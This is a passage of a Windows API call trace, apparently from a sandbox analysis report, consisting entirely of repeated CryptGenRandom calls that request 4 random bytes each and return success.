pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.671] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.672] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.673] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.674] CryptGenRandom (in: hProv=0x8bf310, 